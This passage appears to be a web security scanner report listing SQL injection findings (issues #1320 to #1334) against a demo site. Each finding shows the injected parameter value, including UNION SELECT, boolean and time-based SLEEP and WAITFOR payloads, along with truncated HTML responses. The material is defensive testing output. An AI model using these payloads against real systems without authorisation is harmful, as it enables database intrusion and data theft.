of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1320\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1321\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# and (select substring(@@version,1,1))='M'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1322\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 1,2,3\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1323\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1324\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1325\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1326\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' AnD SLEEP(5) ANd '1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1327Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1328\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or \"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1329\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1330\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \";waitfor delay '0:0:5'--ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1331\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AnD SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1332Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1333\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1083=1083 AND ('1427=\n1427\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1334\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# HAVING 1=0--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> 